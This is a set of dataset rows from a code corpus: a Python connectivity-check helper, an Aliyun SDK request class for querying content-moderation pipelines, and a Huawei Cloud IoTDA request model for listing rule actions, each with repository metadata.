def _netcheck():
global _Netcheck
if _Netcheck is None:
p = platform()
if p == 'android':
from androidconn import Netcheck
else:
from mockconn import Netcheck
_Netcheck = Netcheck()
return _Netcheck
def connection_available():
return _netcheck().connection_available()
def set_prompt(fn):
_netcheck().set_prompt(fn)
def ask_connect(callback):
_netcheck().ask_connect(callback)
def _get_ref():
return _netcheck()
| 18.4 | 69 | 0.653727 |
79548c4249822c18909fdb16d4b915cf0802d8e6 | 1,936 | py | Python | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | 1 | 2019-12-23T12:36:43.000Z | 2019-12-23T12:36:43.000Z | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | 1 | 2021-02-23T11:27:54.000Z | 2021-02-23T11:27:54.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class QueryPornPipelineListRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Mts', '2014-06-18', 'QueryPornPipelineList','mts')
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_PipelineIds(self):
return self.get_query_params().get('PipelineIds')
def set_PipelineIds(self,PipelineIds):
self.add_query_param('PipelineIds',PipelineIds)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | 35.851852 | 80 | 0.775826 |
79548ce44174ecb00eede427c249a3630f79692d | 9,463 | py | Python | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
class ListRuleActionsRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'instance_id': 'str',
'rule_id': 'str',
'channel': 'str',
'app_type': 'str',
'app_id': 'str',
'limit': 'int',
'marker': 'str',
'offset': 'int'
}
attribute_map = {
'instance_id': 'Instance-Id',
'rule_id': 'rule_id',
'channel': 'channel',
'app_type': 'app_type',
'app_id': 'app_id',
'limit': 'limit',
'marker': 'marker',
'offset': 'offset'
}
def __init__(self, instance_id=None, rule_id=None, channel=None, app_type=None, app_id=None, limit=None, marker=None, offset=None):
"""ListRuleActionsRequest - a model defined in huaweicloud sdk"""
self._instance_id = None
self._rule_id = None
self._channel = None
self._app_type = None
self._app_id = None
self._limit = None
self._marker = None
self._offset = None
self.discriminator = None
if instance_id is not None:
self.instance_id = instance_id
if rule_id is not None:
self.rule_id = rule_id
if channel is not None:
self.channel = channel
if app_type is not None:
self.app_type = app_type
if app_id is not None:
self.app_id = app_id
if limit is not None:
self.limit = limit
if marker is not None:
self.marker = marker
if offset is not None:
self.offset = offset
@property
def instance_id(self):
"""Gets the instance_id of this ListRuleActionsRequest.
实例ID。物理多租下各实例的唯一标识,一般华为云租户无需携带该参数,仅在物理多租场景下从管理面访问API时需要携带该参数。
:return: The instance_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""Sets the instance_id of this ListRuleActionsRequest.
实例ID。物理多租下各实例的唯一标识,一般华为云租户无需携带该参数,仅在物理多租场景下从管理面访问API时需要携带该参数。
:param instance_id: The instance_id of this ListRuleActionsRequest.
:type: str
"""
self._instance_id = instance_id
@property
def rule_id(self):
"""Gets the rule_id of this ListRuleActionsRequest.
规则触发条件ID。
:return: The rule_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._rule_id
@rule_id.setter
def rule_id(self, rule_id):
"""Sets the rule_id of this ListRuleActionsRequest.
规则触发条件ID。
:param rule_id: The rule_id of this ListRuleActionsRequest.
:type: str
"""
self._rule_id = rule_id
@property
def channel(self):
"""Gets the channel of this ListRuleActionsRequest.
规则动作的类型,取值范围: - HTTP_FORWARDING:HTTP服务消息类型。 - DIS_FORWARDING:转发DIS服务消息类型。 - OBS_FORWARDING:转发OBS服务消息类型。 - AMQP_FORWARDING:转发AMQP服务消息类型。 - DMS_KAFKA_FORWARDING:转发kafka消息类型。
:return: The channel of this ListRuleActionsRequest.
:rtype: str
"""
return self._channel
@channel.setter
def channel(self, channel):
"""Sets the channel of this ListRuleActionsRequest.
规则动作的类型,取值范围: - HTTP_FORWARDING:HTTP服务消息类型。 - DIS_FORWARDING:转发DIS服务消息类型。 - OBS_FORWARDING:转发OBS服务消息类型。 - AMQP_FORWARDING:转发AMQP服务消息类型。 - DMS_KAFKA_FORWARDING:转发kafka消息类型。
:param channel: The channel of this ListRuleActionsRequest.
:type: str
"""
self._channel = channel
@property
def app_type(self):
"""Gets the app_type of this ListRuleActionsRequest.
租户规则的生效范围,取值如下: - GLOBAL:生效范围为租户级 - APP:生效范围为资源空间级。如果类型为APP,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:return: The app_type of this ListRuleActionsRequest.
:rtype: str
"""
return self._app_type
@app_type.setter
def app_type(self, app_type):
"""Sets the app_type of this ListRuleActionsRequest.
租户规则的生效范围,取值如下: - GLOBAL:生效范围为租户级 - APP:生效范围为资源空间级。如果类型为APP,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:param app_type: The app_type of this ListRuleActionsRequest.
:type: str
"""
self._app_type = app_type
@property
def app_id(self):
"""Gets the app_id of this ListRuleActionsRequest.
资源空间ID。此参数为非必选参数,rule_id不携带且app_type为APP时,该参数生效,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:return: The app_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._app_id
@app_id.setter
def app_id(self, app_id):
"""Sets the app_id of this ListRuleActionsRequest.
资源空间ID。此参数为非必选参数,rule_id不携带且app_type为APP时,该参数生效,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:param app_id: The app_id of this ListRuleActionsRequest.
:type: str
"""
self._app_id = app_id
@property
def limit(self):
"""Gets the limit of this ListRuleActionsRequest.
分页查询时每页显示的记录数。默认每页10条记录,最大设定每页50条记录,取值范围为1-50的整数。
:return: The limit of this ListRuleActionsRequest.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListRuleActionsRequest.
分页查询时每页显示的记录数。默认每页10条记录,最大设定每页50条记录,取值范围为1-50的整数。
:param limit: The limit of this ListRuleActionsRequest.
:type: int
"""
self._limit = limit
@property
def marker(self):
"""Gets the marker of this ListRuleActionsRequest.
上一次分页查询结果中最后一条记录的ID,在上一次分页查询时由物联网平台返回获得。分页查询时物联网平台是按marker也就是记录ID降序查询的,越新的数据记录ID也会越大。若填写marker,则本次只查询记录ID小于marker的数据记录。若不填写,则从记录ID最大也就是最新的一条数据开始查询。如果需要依次查询所有数据,则每次查询时必须填写上一次查询响应中的marker值。
:return: The marker of this ListRuleActionsRequest.
:rtype: str
"""
return self._marker
@marker.setter
def marker(self, marker):
"""Sets the marker of this ListRuleActionsRequest.
上一次分页查询结果中最后一条记录的ID,在上一次分页查询时由物联网平台返回获得。分页查询时物联网平台是按marker也就是记录ID降序查询的,越新的数据记录ID也会越大。若填写marker,则本次只查询记录ID小于marker的数据记录。若不填写,则从记录ID最大也就是最新的一条数据开始查询。如果需要依次查询所有数据,则每次查询时必须填写上一次查询响应中的marker值。
:param marker: The marker of this ListRuleActionsRequest.
:type: str
"""
self._marker = marker
@property
def offset(self):
"""Gets the offset of this ListRuleActionsRequest.
表示从marker后偏移offset条记录开始查询。默认为0,取值范围为0-500的整数。当offset为0时,表示从marker后第一条记录开始输出。 - 限制offset最大值是出于API性能考虑,您可以搭配marker使用该参数实现翻页,例如每页50条记录,1-11页内都可以直接使用offset跳转到指定页,但到11页后,由于offset限制为500,您需要使用第11页返回的marker作为下次查询的marker,以实现翻页到12-22页。
:return: The offset of this ListRuleActionsRequest.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListRuleActionsRequest.
表示从marker后偏移offset条记录开始查询。默认为0,取值范围为0-500的整数。当offset为0时,表示从marker后第一条记录开始输出。 - 限制offset最大值是出于API性能考虑,您可以搭配marker使用该参数实现翻页,例如每页50条记录,1-11页内都可以直接使用offset跳转到指定页,但到11页后,由于offset限制为500,您需要使用第11页返回的marker作为下次查询的marker,以实现翻页到12-22页。
:param offset: The offset of this ListRuleActionsRequest.
:type: int
"""
self._offset = offset
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRuleActionsRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.543333 | 233 | 0.632886 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.